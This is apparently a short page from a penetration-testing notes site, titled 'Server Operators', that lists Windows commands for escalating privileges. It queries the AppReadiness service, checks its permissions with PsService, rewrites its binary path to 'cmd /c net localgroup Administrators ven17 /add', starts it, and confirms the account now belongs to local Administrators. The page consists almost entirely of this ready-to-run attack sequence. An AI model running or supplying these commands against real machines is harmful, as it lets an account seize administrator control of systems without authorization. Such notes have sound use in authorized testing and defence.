Server Operators
ABOUT
Querying the Service
C:\> sc.exe qc AppReadinessChecking Service Permissions with PsService
C:\> c:\Tools\PsService.exe security AppReadinessModifying the Service Binary Path
C:\> sc.exe config AppReadiness binPath= "cmd /c net localgroup Administrators ven17 /add"C:\> sc.exe start AppReadinessConfirming Local Admin Group Membership
C:\> net localgroup AdministratorsLast updated